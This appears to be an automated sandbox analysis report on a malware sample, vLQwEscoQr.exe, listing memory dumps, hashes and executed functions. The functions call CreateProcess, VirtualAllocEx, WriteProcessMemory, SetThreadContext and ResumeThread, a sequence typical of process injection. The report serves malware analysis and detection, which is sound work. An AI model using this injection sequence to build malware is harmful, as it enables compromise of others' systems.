Source File: 00000000.00000002.1290310794.00000000009ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 009ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9ed000_Scan copy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa41ff07433e7167ea3076dcba0c838a0404cb08658f1c1348b4a9708f4ffc12
Instruction ID: c83ebb325993f4085564231fe40c20a47cbdfe3655f88246f1a02987cd4600d8
Opcode Fuzzy Hash: fa41ff07433e7167ea3076dcba0c838a0404cb08658f1c1348b4a9708f4ffc12
Instruction Fuzzy Hash: 48F06271405384AEE7118B16CD84B66FF9CEB91735F18C55AED084F286C2799C44CA71

Non-executed Functions

Function 0595CAD8 Relevance: 7.3, Strings: 5, Instructions: 1028COMMON

Download Yara Rule

Strings

TJq, xrefs: 0595CC7E
4'q, xrefs: 0595D6D4
xbq, xrefs: 0595CC09
pq, xrefs: 0595D7AB
Teq, xrefs: 0595D32F

Memory Dump Source

Source File: 00000000.00000002.1295727036.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5950000_Scan copy.jbxd

Similarity

API ID:
String ID: 4'q$TJq$Teq$pq$xbq
API String ID: 0-4142780942
Opcode ID: b61c9d9b523e482d3e4416ee019a0248c63acd9c149d12a9e07182444583a2eb
Instruction ID: e3e95625589711951044e835381b62242153fd328a5c4464382ef560ae1cec93
Opcode Fuzzy Hash: b61c9d9b523e482d3e4416ee019a0248c63acd9c149d12a9e07182444583a2eb
Instruction Fuzzy Hash: 77B2D274E00228CFDB65CF69C984AD9BBB2FF89304F1581E9D509AB265DB319E91CF40

Function 0595C830 Relevance: 1.4, Strings: 1, Instructions: 169COMMON

Download Yara Rule

Strings

4'q, xrefs: 0595C911

Memory Dump Source

Source File: 00000000.00000002.1295727036.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5950000_Scan copy.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: 47a2b04171b9303f927a6ee3e1d236fefd6a586ca1604c03645b8d3f102f3d86
Instruction ID: ce1d35f31429321feb31f3cec5c5f3a366d51e69447aaae3dccbffaebb0dd295
Opcode Fuzzy Hash: 47a2b04171b9303f927a6ee3e1d236fefd6a586ca1604c03645b8d3f102f3d86
Instruction Fuzzy Hash: 5471FA70E002488FEB09EF6BE845A9A7BF2FBC9301F14D529D0059B26DEB74594ADB41

Function 0595C840 Relevance: 1.4, Strings: 1, Instructions: 159COMMON

Download Yara Rule

Strings

4'q, xrefs: 0595C911

Memory Dump Source

Source File: 00000000.00000002.1295727036.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5950000_Scan copy.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: d365a0024fba7a677b892dcd84acec45458d37ff98945459ff6c895f4aac0233
Instruction ID: 3d8ae24e1728943d28f4643a04b67abf6c24b850a67ce9107da0da6c907401c5
Opcode Fuzzy Hash: d365a0024fba7a677b892dcd84acec45458d37ff98945459ff6c895f4aac0233
Instruction Fuzzy Hash: BB61D970E002488FEB09EF6BE845A9ABBF3FBC9301F14D529D0059B26DDB74594ADB41

Function 06C88680 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1297034848.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c80000_Scan copy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6e733b0717086459c3803f457fa06115f7c51a2d7b58d1e4e4471dd351a3738
Instruction ID: 2fe19bf43b4157d62166ec45c1563d497f16f50055fe049da51ea427c91f1db0
Opcode Fuzzy Hash: c6e733b0717086459c3803f457fa06115f7c51a2d7b58d1e4e4471dd351a3738
Instruction Fuzzy Hash: 28E1D574E002198FDB64DFA9C580AAEBBF2FF89304F648169D414AB759D730AD41CFA1

Function 06C894C0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1297034848.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c80000_Scan copy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39e1345f3b681dea036c49d8a853a1c9d3c29ad38256d01d5831153a42423895
Instruction ID: 2f84b5bc7f949103f59e7b4a5d37c09f6a82a2e85859b0661a9eb987f1eb0529
Opcode Fuzzy Hash: 39e1345f3b681dea036c49d8a853a1c9d3c29ad38256d01d5831153a42423895
Instruction Fuzzy Hash: 51E1D574E002198FDB64DFA9C580AAEBBF2FF89305F248169D414AB359D731AD41CFA1

Function 06C87390 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1297034848.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c80000_Scan copy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58e37e6988dfd53886fa0e296a71224ab9543288eecbab0d2abece8f97bc21c7
Instruction ID: fc8235c94643bb6eb56ea9a5409667d2e42be84b28c1e9be06de56fe2813926a
Opcode Fuzzy Hash: 58e37e6988dfd53886fa0e296a71224ab9543288eecbab0d2abece8f97bc21c7
Instruction Fuzzy Hash: 9AE1C374E002198FDB64DFA9C580AAEBBF2FF89305F248169D415AB359D730AD41CFA1

Function 06C86F58 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1297034848.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c80000_Scan copy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f34f93ab38a7e1bb6274477b5d8d14b1e767e7392f4c0b379a99a51af76d144c
Instruction ID: 26d9ff45fee9ec1dcf950541ce4ad532fb23626d9a39c3f138456dca7cfe08cc
Opcode Fuzzy Hash: f34f93ab38a7e1bb6274477b5d8d14b1e767e7392f4c0b379a99a51af76d144c
Instruction Fuzzy Hash: EEE1E674E002198FDB14DFA9C580AAEBBF2FF89304F248169D814AB359D735AD41CFA1

Function 06C88AB8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1297034848.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c80000_Scan copy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0faa3dc076c80f81bc8dd8064f1256b16fd1b97594a56429614f393f0eaea82a
Instruction ID: 4d1680155d91230bfe55c26001699d29ad35bdea096c6e5d1bd11093e135461e
Opcode Fuzzy Hash: 0faa3dc076c80f81bc8dd8064f1256b16fd1b97594a56429614f393f0eaea82a
Instruction Fuzzy Hash: CEE1D774E012198FDB64DFA9C580AAEBBF2FF89304F648169D414AB759D730AD41CFA0

Function 00B4E094 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1290981809.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b40000_Scan copy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 573d1d4d2dde0b41e652c00f77b9d79a9f77d17eaf0a9bd8038cde8aa0d0210d
Instruction ID: 3433e063c08d25abbe71d0fa381aadd38259ca981d5f1727cc43ece8b155207d
Opcode Fuzzy Hash: 573d1d4d2dde0b41e652c00f77b9d79a9f77d17eaf0a9bd8038cde8aa0d0210d
Instruction Fuzzy Hash: 70A14C36E0021A8FCF09DFA4C8445AEB7F2FF85300B1545BAE915AB265DB71EA15DB40

Function 06C894BB Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1297034848.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c80000_Scan copy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f10cf0c85fbd5fb7a2acea1103b3dc71319f108ae567267acb361ca35234417b
Instruction ID: 150d2fd752a272f168115fff47e3e7a83f81b1581085f805f32a38455186b3bf
Opcode Fuzzy Hash: f10cf0c85fbd5fb7a2acea1103b3dc71319f108ae567267acb361ca35234417b
Instruction Fuzzy Hash: 5951D974E002198FDB58DFA9C5805AEFBF2FF89305F248169D418AB355D7319941CFA1

Analysis Process: vLQwEscoQr.exePID: 7512, Parent PID: 932COMMON

Execution Graph

Execution Coverage:	12%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	230
Total number of Limit Nodes:	16

Executed Functions

Function 07979C3D Relevance: 1.7, APIs: 1, Instructions: 246
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07979E76

Memory Dump Source

Source File: 0000000D.00000002.1351455615.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7970000_vLQwEscoQr.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 3cea4ec7e242f5b96f022c594168fc7494fe4594b9db23834b40386d40785cd5
Instruction ID: 00b9ab7eff67d9a243b731615766ec7fea9dcb2c48732feeccde796bd7235169
Opcode Fuzzy Hash: 3cea4ec7e242f5b96f022c594168fc7494fe4594b9db23834b40386d40785cd5
Instruction Fuzzy Hash: F4914BB1D0071ACFDF24DF68C885BEDBBB6EB48324F048569E809A7240DB749985CF91

Function 07979C40 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07979E76

Memory Dump Source

Source File: 0000000D.00000002.1351455615.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7970000_vLQwEscoQr.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 0a4a9189c2b5ba400cf4101b4912cbffb912d024550daed2da312305e3a09964
Instruction ID: d5bf8cc077551da77298aaf06ecd043029c62cabdff5a6199e89a5d39221b751
Opcode Fuzzy Hash: 0a4a9189c2b5ba400cf4101b4912cbffb912d024550daed2da312305e3a09964
Instruction Fuzzy Hash: 2D914BB1D0071ACFDF24DF68C8857DDBBB6EB48324F048569E809A7240DB749985CF91

Function 02E3B2CD Relevance: 1.7, APIs: 1, Instructions: 193
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02E3B51E

Memory Dump Source

Source File: 0000000D.00000002.1346314320.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2e30000_vLQwEscoQr.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: b05eeba5ef75b34524356e41f76029a79e5b8f2139701b955a64b0cc9f5a7c04
Instruction ID: 97dd63024a7e1a33dcb4f4d9c5513bbe75df956e7f51bc06bc77f34dabb9731f
Opcode Fuzzy Hash: b05eeba5ef75b34524356e41f76029a79e5b8f2139701b955a64b0cc9f5a7c04
Instruction Fuzzy Hash: A2713770A00B058FD725DF29D45579ABBF2FF88309F008A2DD08AD7A50E775E946CB91

Function 02E35DCC Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02E35E89

Memory Dump Source

Source File: 0000000D.00000002.1346314320.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2e30000_vLQwEscoQr.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 25c08df5020c7cc060d904f74fdbb6bb19acf3fb37c4f51add75844abe5582d0
Instruction ID: 50fd3379ec14483df5c7c79bc7b20acdfb58628410d918c7c56da25c95729073
Opcode Fuzzy Hash: 25c08df5020c7cc060d904f74fdbb6bb19acf3fb37c4f51add75844abe5582d0
Instruction Fuzzy Hash: 5F41DEB1C00719CFDB25CFAAC884BDEBBB2BF48304F6081AAD418AB251DB755946CF50

Function 02E34544 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02E35E89

Memory Dump Source

Source File: 0000000D.00000002.1346314320.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2e30000_vLQwEscoQr.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 0a4cd5a8cfd6b23835b2860f9415f850f92b060273ce0ce8202cf8ddaed99f22
Instruction ID: f905675b24ae27a448085086a6e9c207ba203e4ffe6cdc34c277b389e860ad4a
Opcode Fuzzy Hash: 0a4cd5a8cfd6b23835b2860f9415f850f92b060273ce0ce8202cf8ddaed99f22
Instruction Fuzzy Hash: 7741E275C00719CBDB25DFAAC8847CEBBF5BF48304F60806AD419AB250DB756946CF90

Function 075F7668 Relevance: 1.6, APIs: 1, Instructions: 85
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000D.00000002.1351226693.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_75f0000_vLQwEscoQr.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 3055103ec8ec268c0ed6cc5177ad2df6953a1d7175f85418f0dbc93fbfb20598
Instruction ID: c611dfe98935e30844699e4856ccb97af48ec6166a2ebbf45bf0bc5598dbb4f7
Opcode Fuzzy Hash: 3055103ec8ec268c0ed6cc5177ad2df6953a1d7175f85418f0dbc93fbfb20598
Instruction Fuzzy Hash: CD318BB29043499FCB11DFA9D840ADEBFF8EF49310F14846AE654EB261C335A851DFA1

Function 0797D2C2 Relevance: 1.6, APIs: 1, Instructions: 82
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0797D28D

Memory Dump Source

Source File: 0000000D.00000002.1351455615.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7970000_vLQwEscoQr.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: aeb731a825399d1e9aca6df7fb215dd6467321fc9de993a951d811cdc5369eab
Instruction ID: b2a8f3c4913cc344a98cae37ed937ad680249b9dad634307663974f600bac60a
Opcode Fuzzy Hash: aeb731a825399d1e9aca6df7fb215dd6467321fc9de993a951d811cdc5369eab
Instruction Fuzzy Hash: E521ADB6E043198FDB10DF94E845BEEBBF4AF88318F04845AD404BB240C775AA45CBA1

Function 079799B1 Relevance: 1.6, APIs: 1, Instructions: 75
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07979A48

Memory Dump Source

Source File: 0000000D.00000002.1351455615.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7970000_vLQwEscoQr.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: a647b36e79de1bda505ceffa5d02c27082f9b284b83de1a1674b264b226782cc
Instruction ID: 2f494af526f7ed68ad210d19b6efd24367183f1602c3f7233d49de5ce1a6965b
Opcode Fuzzy Hash: a647b36e79de1bda505ceffa5d02c27082f9b284b83de1a1674b264b226782cc
Instruction Fuzzy Hash: DC216BB1D003199FDB10DFA9C881BDEBBF5FF48320F10842AE958A7240C7799941CBA0

Function 075F6810 Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 075F68AF

Memory Dump Source

Source File: 0000000D.00000002.1351226693.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_75f0000_vLQwEscoQr.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: 760416a363c882166b8cebfc918e2f129f041a5be76ba76795107df3ee5c44e3
Instruction ID: b2a4149008a758d1904756182ca92e77f214a2c15a2ea7bc279d115603f44af5
Opcode Fuzzy Hash: 760416a363c882166b8cebfc918e2f129f041a5be76ba76795107df3ee5c44e3
Instruction Fuzzy Hash: 5431C3B5D0020A9FDB10DF9AD884ADEFBF5FB48320F14842EE919A7210D7759945CFA0

Function 079793E1 Relevance: 1.6, APIs: 1, Instructions: 69threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07979466

Memory Dump Source

Source File: 0000000D.00000002.1351455615.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7970000_vLQwEscoQr.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: b5e5b1b79f9a2c39b1fb0a08fd8f4dae74224cc56d73a89e403db25ae4fcab2b
Instruction ID: 6c51ae81c7fd278c52ebc703e829b7e6fb6e5718312609d4410174a7e54e5476
Opcode Fuzzy Hash: b5e5b1b79f9a2c39b1fb0a08fd8f4dae74224cc56d73a89e403db25ae4fcab2b
Instruction Fuzzy Hash: B82148B1D003198FDB20DFAAC4817EEBBF5EB48324F54842AD459A7240CB78A945CBA4

Function 079799B8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07979A48

Memory Dump Source

Source File: 0000000D.00000002.1351455615.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7970000_vLQwEscoQr.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: acf8894cdd9ec0d889c315d5f45bf10b521f9909288313a28b4d93a54b6ab25a
Instruction ID: f4668c65c9bb185997996bbd8f79e187cb1988cabfb7368635ddc98fb2fc6247
Opcode Fuzzy Hash: acf8894cdd9ec0d889c315d5f45bf10b521f9909288313a28b4d93a54b6ab25a
Instruction Fuzzy Hash: 5F2139B1D003099FDB14DFAAC881BDEBBF5FF48324F508429E959A7240C779A941CBA4

Function 075F6818 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 075F68AF

Memory Dump Source

Source File: 0000000D.00000002.1351226693.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_75f0000_vLQwEscoQr.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: 6814872466fa356c85b70565a05b88f8230be7043ab26f751815f0366428c2e8
Instruction ID: ba087b01f5361bf0ec6810e1b8049dbbfc065d6d8df7fb5f0716586ec12ce259
Opcode Fuzzy Hash: 6814872466fa356c85b70565a05b88f8230be7043ab26f751815f0366428c2e8
Instruction Fuzzy Hash: 4421ACB5D0020A9FDB10DF9AD884ADEBBF5FB48320F14842EE919A7210D775A945CFA0

Function 07979AA0 Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07979B28

Memory Dump Source

Source File: 0000000D.00000002.1351455615.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7970000_vLQwEscoQr.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: fb9b70c827fb39583eb4e935aa338556241fc5327ff2b91057aa446e20e101b1
Instruction ID: 210bd0890e1eadd26c60eb649ceee6fcfcca72e67ba73c7331785d51f91992d7
Opcode Fuzzy Hash: fb9b70c827fb39583eb4e935aa338556241fc5327ff2b91057aa446e20e101b1
Instruction Fuzzy Hash: FA2107B1D003599FDB10DFAAD841BDEBBF5FF48320F50842AE959A7240C7359941CBA4

Function 02E3D308 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02E3D76E,?,?,?,?,?), ref: 02E3D82F

Memory Dump Source

Source File: 0000000D.00000002.1346314320.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2e30000_vLQwEscoQr.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 7795dc78690a4ec981f6c31a5964b70cfab812dfe3f3348bc431562a8e5171d6
Instruction ID: 63e23cf72ed019238c435ea06fd304fa4323015a3a2ec30302e16a959811736f
Opcode Fuzzy Hash: 7795dc78690a4ec981f6c31a5964b70cfab812dfe3f3348bc431562a8e5171d6
Instruction Fuzzy Hash: 062103B5D002089FDB10CF9AD984ADEFBF4FB48310F14806AE918A3310D375A941CFA0

Function 079793E8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07979466

Memory Dump Source

Source File: 0000000D.00000002.1351455615.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7970000_vLQwEscoQr.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 240b72f9e2f3c2f60bed9a41735f54af4e5a34fa3a55169f4b0ed6e80600e491
Instruction ID: 3110b8d6139e74f09a0f4e8f4978e1becab93b82b707610ea3915e90fb9cbd01
Opcode Fuzzy Hash: 240b72f9e2f3c2f60bed9a41735f54af4e5a34fa3a55169f4b0ed6e80600e491
Instruction Fuzzy Hash: CF2138B1D003098FDB10DFAAC4857EEBBF5EF48324F548429D559A7240CB78A945CFA4

Function 07979AA8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07979B28

Memory Dump Source

Source File: 0000000D.00000002.1351455615.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7970000_vLQwEscoQr.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 57b144df31f6113d585dcceb342b6056c08c6b9ce6f19e0d383fdb8e3c085af4
Instruction ID: ebb609d3d59c8577df5e79f3cdc542042e78a0df274e42d8cb1ab530bffc543d
Opcode Fuzzy Hash: 57b144df31f6113d585dcceb342b6056c08c6b9ce6f19e0d383fdb8e3c085af4
Instruction Fuzzy Hash: 392128B1C003499FDB10DFAAC881BDEBBF5FF48320F50842AE919A7240C7399901CBA4

Function 079798F0 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07979966

Memory Dump Source

Source File: 0000000D.00000002.1351455615.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7970000_vLQwEscoQr.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 29ae6794804ea45c61973744eb3995f3fcf29a4d1a24f6933e02670fe40bce8b
Instruction ID: f6cbfac37ff6d40c9253d47ba31009c962505a36ef40c873f419ec747de1adc1
Opcode Fuzzy Hash: 29ae6794804ea45c61973744eb3995f3fcf29a4d1a24f6933e02670fe40bce8b
Instruction Fuzzy Hash: 181136719002098FDB20DFA9C845BEEBBF5EB48320F24881AE555A7250C7369541CFA0

Function 075F420C Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,075F7682,?,?,?,?,?), ref: 075F7727

Memory Dump Source

Source File: 0000000D.00000002.1351226693.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_75f0000_vLQwEscoQr.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: b884bb3e7571b72da8e9f4ef7bd3e8c843aef2df8ccb5b5df33ce86c95f5c29f
Instruction ID: f729fb24543a589a33834a0c0570f7b7f43ae7fa7abe4ed9cb8889a22261901f
Opcode Fuzzy Hash: b884bb3e7571b72da8e9f4ef7bd3e8c843aef2df8ccb5b5df33ce86c95f5c29f
Instruction Fuzzy Hash: 321137B580034D9FDB20DF9AD844BDEBFF8EB48320F54841AEA55A7250C375A950DFA4

Function 07979330 Relevance: 1.6, APIs: 1, Instructions: 55threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0797939A

Memory Dump Source

Source File: 0000000D.00000002.1351455615.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7970000_vLQwEscoQr.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 3030d793f870d12faf7a8658b14fd64f4c2585d021b0f54effb0d17753ff2b19
Instruction ID: 3c19f6e3c02c7a808198187b3092a98c7ad70d0ca08a758ff4cd53bb03a0b0b5
Opcode Fuzzy Hash: 3030d793f870d12faf7a8658b14fd64f4c2585d021b0f54effb0d17753ff2b19
Instruction Fuzzy Hash: D2119AB1C003098FDB20DFAAD4457EEFBF5EB48324F20881AD419A7640CB356941CFA4

Function 0797D228 Relevance: 1.6, APIs: 1, Instructions: 53windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0797D28D

Memory Dump Source

Source File: 0000000D.00000002.1351455615.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7970000_vLQwEscoQr.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 4b1d0be3a866abca6b0ff1283f4edf9f2f27005f83cc015795795b2f69299104
Instruction ID: a2090e9d9551c3d89b27989d80405232384cc5e95b7ef3afca4cb7100bb3f289
Opcode Fuzzy Hash: 4b1d0be3a866abca6b0ff1283f4edf9f2f27005f83cc015795795b2f69299104
Instruction Fuzzy Hash: 301125B59003499FDB20DF9AD885BDEBBF8EB48324F10841AD959A7201C375A541CFA1

Function 079798F8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07979966

Memory Dump Source

Source File: 0000000D.00000002.1351455615.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7970000_vLQwEscoQr.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 8bbd7e5a663efdc9a5d84f453902a80526c4be8186ebbccf35a86f5c200935a5
Instruction ID: c76bd52295bbcfb544d2945afab10b1e4650af819cc793adfb76cfa1d7f1c59f
Opcode Fuzzy Hash: 8bbd7e5a663efdc9a5d84f453902a80526c4be8186ebbccf35a86f5c200935a5
Instruction Fuzzy Hash: DE112671C003499FDB20DFAAC845BDEBBF9EB48320F148419E555A7250CB75A941CFA0

Function 07979338 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0797939A

Memory Dump Source

Source File: 0000000D.00000002.1351455615.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7970000_vLQwEscoQr.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: dc86ca5a25f507e406179b5a226982a1a39ed3b60a1bb36b4c6698a04ba179ee
